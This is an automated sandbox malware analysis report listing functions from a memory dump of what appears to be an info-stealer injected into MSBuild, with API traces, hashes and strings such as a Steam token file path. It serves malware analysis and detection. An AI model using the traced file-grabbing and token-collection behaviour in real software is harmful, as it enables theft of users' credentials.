                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                            • String ID: vk@
                                                                                                                                                                                                                                                                            • API String ID: 544645111-1609055756
                                                                                                                                                                                                                                                                            • Opcode ID: abe993e6a5faea2bfcf56a2b20c08ab0ee7ea3218432fb0e61e077619d9822d5
                                                                                                                                                                                                                                                                            • Instruction ID: ef246bb6e77e2ce5c1cbaeb9d736d4ed160d525c385bb499bba06b0d7229889a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abe993e6a5faea2bfcf56a2b20c08ab0ee7ea3218432fb0e61e077619d9822d5
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11C6717041149FD724EF58DC80BA5F3E9FB0A300F11853BE94AE3280D239AD619B99
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00411670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                            • String ID: .kB
                                                                                                                                                                                                                                                                            • API String ID: 1699248803-3544784936
                                                                                                                                                                                                                                                                            • Opcode ID: 8ddb3fbb5f101234d18f10792ea48ab4f94465df1fa0f1a004282101dffa5124
                                                                                                                                                                                                                                                                            • Instruction ID: 08e6df121948f359e20d6638f50baa7717a6df4eef03d69ec9a9e382529e61fd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ddb3fbb5f101234d18f10792ea48ab4f94465df1fa0f1a004282101dffa5124
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9BF08231A1015CABDB50DB98DC51B9DB7FDDB44715F1041A6AA08A72C0E6706F068B94
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00411610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID: *@
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-721074590
                                                                                                                                                                                                                                                                            • Opcode ID: d4a04352c1afe236edbef256063f287af5637b0053568ba969055f4ba9eb999a
                                                                                                                                                                                                                                                                            • Instruction ID: f6536893b7a7aeed5e907a3204093546bb083ccea3707cf4767cf421749fbeef
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4a04352c1afe236edbef256063f287af5637b0053568ba969055f4ba9eb999a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF08271901658ABC710DF58D901B997768EB15B30F10436AFC35937D0C73D6A4086C4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00410CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                                                                            • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                                                            • Opcode ID: 2ef8fbb7949aabe7868359b9e21dc6183fcb6fe57ffee9621cf9c697f8b64d8d
                                                                                                                                                                                                                                                                            • Instruction ID: 41a17a1faf57410821858b33150c3f320e6afa38bc50d74bf31dd174f95e6ec7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ef8fbb7949aabe7868359b9e21dc6183fcb6fe57ffee9621cf9c697f8b64d8d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFE0923170412857CB20AAD8FC02BED776C9B04615F00417AFD08E3281EE685A1887D9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00415560 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00427383,?,00000000,004225D0,000000FF,?,00418244,?), ref: 004155C7
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Soft\Steam\steam_tokens.txt, xrefs: 004155DF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$CreateObjectSingleSleepThreadWaitlstrcat
                                                                                                                                                                                                                                                                            • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                                            • API String ID: 2356188485-3507145866
                                                                                                                                                                                                                                                                            • Opcode ID: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                                                            • Instruction ID: 72bb85e2ae34570a401298599826632edfc0c26c1556d4927fbe038025474c9d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 82f7f66776da159feb174cd1c052f2c75f514489b5fd89381fe20bfe032bc715
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91217171800248EACB10EBE5C946BDDBB78AF19314F50417EE515736D2DB7C2708CAB6
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 004116D0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 35memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocLocal
                                                                                                                                                                                                                                                                            • String ID: @<A
                                                                                                                                                                                                                                                                            • API String ID: 3494564517-4260584491
                                                                                                                                                                                                                                                                            • Opcode ID: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                            • Instruction ID: ca1a9253186f1b5ee703eb257632d364ba5c8053fd628161870718111730db74
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea00a148863c1ebc4c14e0b152142d2a107d03e69eab002bf71996523b5e63db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9EF05C3A3007111783120B9D88405A7F79EFFC6E11704012BDB68CB3A4C931DC4042E0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00407FC0 Relevance: 2.8, APIs: 2, Instructions: 260stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040822B
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0040823F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2500673778-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                            • Instruction ID: ea5c140e8df150c45b94e9dcb21e72039a34b19554562d26b54438b66e46b29d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7795965975be68010b164d7d6a4c4c17dd5602c05824522f676f6fbefe93c2e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24B17C70801248EACB14EBA4D951BEDBBB9AF19304F54417EE506732D2DB786B0CC765
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00417810 Relevance: 2.6, APIs: 2, Instructions: 141stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00417867
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00E391B8), ref: 00417886
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417588
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindFirstFileA.KERNEL32(?,?), ref: 0041759F
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D4), ref: 004175DC
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,004276D8), ref: 004175F6
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 0041761B
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: StrCmpCA.SHLWAPI(?,0042734E), ref: 0041762A
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417647
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: PathMatchSpecA.SHLWAPI(?,?), ref: 00417677
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,00E39A50), ref: 004176A3
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F0), ref: 004176B5
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176C3
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,004276F4), ref: 004176D5
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: lstrcat.KERNEL32(?,?), ref: 004176E9
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: CopyFileA.KERNEL32(?,?,00000001), ref: 004176FF
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: wsprintfA.USER32 ref: 00417666
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: DeleteFileA.KERNEL32(?), ref: 0041777D
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindNextFileA.KERNEL32(000000FF,?), ref: 004177B7
                                                                                                                                                                                                                                                                              • Part of subcall function 00417550: FindClose.KERNEL32(000000FF), ref: 004177C9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2104210347-0
                                                                                                                                                                                                                                                                            • Opcode ID: 19d8bb7641ed99d738dae766f0dc988b0d5e61dade8f460a10954d72e843e993
                                                                                                                                                                                                                                                                            • Instruction ID: 2e57dd990f11a9539e32d0faed319d5d26a9de71c519438fa1fc2cba58423c01
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19d8bb7641ed99d738dae766f0dc988b0d5e61dade8f460a10954d72e843e993
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451C5B5900204EBCB14EBA4DC42EEE7B7AAB4C704F00432EF91557692DB789B548BE5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 00406670 Relevance: 2.6, APIs: 2, Instructions: 71memoryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,00000000,?,?,?,00406B2E,00000000), ref: 004066CF
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,?,00406B2E,00000000), ref: 00406703
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                            • Opcode ID: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                                            • Instruction ID: c00277f812735639d14bf9be3faa546bda705447e3ead095c8c0065c08ee9dfd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05b4c1d6b8d8c16b753068be011d095b66a4696be7e78814b8d4b5191835b582
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC21A2713407009BD734CB79CC81BA7B7EAAB80714F144A2EEA5AD6390D67AA8908658
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                            Function 6CAC6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CAC6CCC
                                                                                                                                                                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAC6D11
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(0000000C), ref: 6CAC6D26
                                                                                                                                                                                                                                                                              • Part of subcall function 6CACCA10: malloc.MOZGLUE(?), ref: 6CACCA26
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CAC6D35
                                                                                                                                                                                                                                                                            • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CAC6D53
                                                                                                                                                                                                                                                                            • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CAC6D73
